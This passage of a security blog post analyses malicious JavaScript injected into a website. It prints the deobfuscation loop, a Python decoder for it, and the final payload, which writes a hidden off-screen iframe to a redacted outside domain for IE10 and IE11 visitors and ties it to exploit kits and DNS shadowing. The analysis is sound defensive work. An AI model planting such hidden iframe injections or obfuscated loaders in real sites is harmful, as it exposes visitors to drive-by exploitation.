 for (propertyIsEnumWhile = buttonUntaint; propertyIsEnumWhile < onloadCheckbox.length; propertyIsEnumWhile++) {  
   formsEncodeURIComponent = onloadCheckbox.charCodeAt(propertyIsEnumWhile);  
   if (constEncodeURIComponent % undefinedFinally) {  
     isFiniteDocument += String.fromCharCode(((returnButton + formsEncodeURIComponent - 97) ^ continueNew.charCodeAt(buttonFalse % continueNew.length)) % 255);  
     buttonFalse++;  
   } else {  
     returnButton = (formsEncodeURIComponent - 97) * 13 * undefinedFinally;  
   }  
   constEncodeURIComponent++;  
 }[]["constructor"]["constructor"](isFiniteDocument)();  

Aside the use of really badly named variables which can lead to confusion, we note three important things:
  • ["rv:11", "MSIE", ];
    The javascript code tries to autodect the browser. It search for IE11 and more interstingly, the table finishs with ', ]'. I think that the code is autogenerated upon demand, and can autodetect way more borwser. This one wants to detect MSIE or IE11, but the generator code must have more browser and versions.
  • navigator.userAgent.indexOf("MSIE 10")
    The previous check and this one are used to set up a variable to the value of "2" if the browser is IE10 or IE11. Interesting, this javascript targets recent browsers (at least, not an IE8 ^_^ ).
  • continueNew = "6pbXWbAoyVTSfe"; and .replace(/[^a-z]/g, "");
    That continueNew variable is a key. The replace part just takes all the lowercase characters from the screenXConfirm <span> id. It's interesting. The span id is used twice, one for its numbers, another for its lowercase letters. They are used to encrypt layers of obfuscated javascript. We understand better why this span id looks like a bunch of random things.
And we have a decyphering function which decrypt the lowercase characters with the key and the variable setted with the user-agent. This is a really weird way to redirect browser to a specific location... A simple "if" case would have done the job, remeber that we are under two layer of obfuscation.

I used again a bit of python code to see where we are going. I didn't even tried to reverse the decyphering function, because copy-pasting it "just works" (yes, javascript == python ^_^ ):
1:  #! /usr/bin/python  
2:  import re  
3:  screenXConfirm="0 23 2cs2 czc22 1m3a (once again, all of the span id chars)k5 74 75 89aban-eqcdcia-jaod-ra.vd.r-esaicmec-a-mco"  
4:  key="6pbXWbAoyVTSfe"  
5:    
6:  returnButton=0  
7:  undefinedFinally=2 #If you have MSIE10 or MSIE11  
8:  buttonFalse=0  
9:  constEncodeURIComponent=0  
10:  isFiniteDocument=[]  
11:    
12:  onloadCheckbox=[]  
13:  for i in screenXConfirm:  
14:    c=(re.sub(r"[^a-z]","",i))  
15:    if len(c) > 0:  
16:      onloadCheckbox.append(ord(c))  
17:    
18:  for formsEncodeURIComponent in onloadCheckbox:  
19:    if (constEncodeURIComponent%undefinedFinally):  
20:      num=(returnButton+formsEncodeURIComponent-97)^ord(key[buttonFalse%len(key)])  
21:      buttonFalse+=1  
22:      isFiniteDocument.append(chr(num%255))  
23:    else:  
24:      returnButton=(formsEncodeURIComponent-97)*13*undefinedFinally  
25:    constEncodeURIComponent+=1  
26:    
27:  print ''.join(isFiniteDocument)  

4/ Hiding in plain sight

Don't let your guard down... or you'll die.

The last javascript code, after beautifying, is:
 p = "PHP_SESSION_PHP";  
 if (document.cookie.indexOf(p) == -1) {  
   document.write('<style>.kkvhavtlfdalg{position:absolute;top:-809px;width:300px;height:300px;}</style>  
   <div class="kkvhavtlfdalg">  
   <iframe src="http://--redacted.redacted--.co.uk/hYCKyYdJsc_cn_JxHu.html" width="250" height="250">  
   </iframe>  
   </div>');  
 }  
 c = p + "=364; path=/; expires=" + new Date(new Date().getTime() + 604800000).toUTCString();  
 document.cookie = c;  
 document.cookie = "_" + c;  

We notice immediately two things:
  • The use of the cookie PHP_SESSION_PHP. This is made to look like a legit cookie from a PHP Session. I search through all github repositories, open sources repos and couldn't find one legitimate use of this Cookie. If you have this cookie stored in your browser, I have some bad news for you.
    You can check for Firefox with sqlite:
     mitsurugi@dojo:~/.mozilla/firefox/39wilkuz.default$ sqlite3 cookies.sqlite  
     SQLite version 3.7.13 2012-06-11 02:05:22  
     Enter ".help" for instructions  
     Enter SQL statements terminated with a ";"  
     sqlite> select baseDomain from moz_cookies where name like 'PHP_SESSION_PHP';  
     sqlite>  
    

    (yeah, I know, the attack targets IE, but this is Firefox. Whatever.)
  •  The domain where the iframe points to:
    This domain doesn't exist anymore. I can't find any records about it. After some readings, I think it's a method called 'DNS shadowing'. The domain is legit, the subdomain is not. The subdomain has a little TTL and is promptly removed after attack. No tracks, no way to hunt down the IP address. Clever.

5/ Conclusion

Weapons are just tools. True strength lies within me.

In this blogpost, we saw how an attacker can do the first part of a fingerprinting. Only clients with IE10 or IE11 are redirected to a (supposed) evil iframe.
The attacker uses nice trick for staying under the radar, with .htaccess and javascript variables names which looks legit. What is hard to understand is the 3 layer of js obfuscation: if you find the first js illegitimate, you have no problem to go through the 3 layers in very little time, so why spend time in order to do this obfuscation? Maybe it confuses some AV? Another thing?
In the end, the most significative way to block an analyst is the DNS shadowing, and it's very effective :-(

If you search the Internet with PHP_SESSION_PHP and DNS shadow, you find connections to Angler Exploit Kit or Darkleech. Without the iframe, it's hard to say what it really was.

0xMitsurugi
 Quotes are taken from SoulCalibur.